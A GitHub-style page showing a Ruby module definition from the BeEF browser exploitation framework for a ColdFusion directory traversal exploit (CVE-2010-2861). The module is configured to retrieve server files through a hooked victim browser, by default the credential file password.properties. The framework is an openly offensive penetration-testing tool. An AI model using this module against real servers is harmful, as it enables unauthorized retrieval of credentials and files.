Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63eef3e97e48dbcae882d309f85d7452aab00487
beef/modules/network/coldfusion_dir_traversal_exploit/module.rb
scotty.b.brown@gmail.com 5c3e6f1575 Adding Apache Licence Header to all files (except VERSION file) 
git-svn-id: https://beef.googlecode.com/svn/trunk@1046 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-07-02 23:08:28 +00:00

59 lines
2.5 KiB
Ruby
Raw Blame History

#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'ColdFusion Directory Traversal Exploit',
'Description' => 'ColdFusion 9.0, 8.0.1, 9.0 and 9.0.1 are vulnerable to directory traversal that leads to arbitrary file retrieval from the ColdFusion server (CVE-2010-2861). </br> For SOP limitations, the victim must be hooked to BeEF through a page served by the ColdFusion server.',
'Category' => 'Network',
'Author' => 'antisnatchor',
'Data' => [
# for Same Origin Policy limitations, right now we're only handling local ColdFusion servers
# (victim hooked on page malware.com/ciccio/pasticcio and CF server reachable at malware.com/CFIDE )
#{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
#{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
{'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties'},
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true
},
{ 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
end
def callback
save({'result' => @datastore['result']})
end
end
Reference in New Issue View Git Blame Copy Permalink